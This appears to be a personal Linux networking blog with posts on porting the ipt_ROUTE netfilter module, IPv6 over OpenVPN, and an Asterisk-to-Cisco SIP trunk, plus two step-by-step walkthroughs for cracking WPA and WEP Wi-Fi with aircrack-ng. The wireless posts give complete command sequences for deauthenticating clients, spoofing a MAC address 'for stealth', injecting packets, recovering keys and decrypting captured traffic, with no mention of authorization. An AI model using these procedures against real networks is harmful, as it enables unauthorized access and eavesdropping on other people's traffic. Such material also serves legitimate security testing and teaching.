Tom Salmon

ipt_ROUTE Netfilter module ported to Linux 2.6.31

May 18

TomLinux General, Linux System Administration, Networking Comments Off

The ipt_ROUTE module became depreciated in an earlier version of Linux 2.6 – however I needed it so ported it to Linux Kernel version 2.6.31.

Disclaimer: wherever possible iproute2 should be used to achieve the desired effect.

The sources include the Kernel module and extensions to iptables.

This module and iptables extension create a new target which may be used on the mangle table.
Target usage: -j ROUTE <option>
options:
–oif ifname – Route packet through `ifname’ network interface
–iif ifname – Change packet’s incoming interface to `ifname’
–gw ip – Route packet via this gateway `ip’
–continue – Route packet and continue traversing the rules. (Not valid with –iif or –tee)
–tee – Duplicate packet and route the duplicate, continue traversing the original packet. (Not valid with –iif or –continue)

I have tested the ported module on the PREROUTING and INPUT chains of the mangle table.

I use this module to route packets that have a destination IP address which matches a local IP address, out of an ethernet interface (using ‘–oif’ option). These packets would normally be directed to the local system.

OpenVPN – IPv6 with tun device

Apr 21

TomIPv6, Linux System Administration, Networking Comments Off

Note: IPv6 is not supported using OpenVPN on Debian Squeeze (stable). The version used by Debian Wheezy (testing) supports IPv6.

Network setup:
- 192.168.1.0/24 - Local IPv4 network
- 2001:412:abcd::/48 - Local IPv6 network
- 192.168.2.0/24 - Tunnel IPv4 network
- 2001:412:abcd:2::/64 - Tunnel IPv6 network

I have included only the sections of config files which need ammending to enable IPv6 over OpenVPN.

Client Config
# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun
# enable ipv6
tun-ipv6

Server Config
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun0
# Enable TUN IPv6 module
tun-ipv6

# Enable to make openvpn the default route for ipv6 connectivity?
;push "route-ipv6 2000::/3"

SIP Trunking between Asterisk 1.4 and Cisco CUBE

Mar 19

TomNetworking Comments Off

As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.

In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)

In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)

The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.

Brute Forcing WPA WiFi Encryption

Mar 19

TomLinux General, Networking, Wireless Comments Off

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

1. Stop Network Manager: /etc/init.d/network-manager stop
2. Enter monitor mode: airmon-ng start wlan0
3. Find nearby networks: airodump-ng mon0
4. Identify the target BSSID and Channel number (-c option below)
5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay –deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 –ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
10. Stop monitor mode: airmon-ng stop mon0

Breaking WEP Encryption

Mar 19

TomLinux General, Networking, Wireless Comments Off

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

1. Stop network manager: /etc/init.d/network-manager stop
2. Enter monitor mode: airmon-ng start wlan0
3. Find nearby networks: airodump-ng mon0
4. Identify the target BSSID, SSID and Channel number (-c option below)
5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
   1. aireplay-ng –fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one mon0
   2. aireplay-ng –arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one -e SSID mon0
   3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
8. The WEP key should then be displayed in the terminal window.
9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
10. Exit monitor mode: airmon-ng stop mon0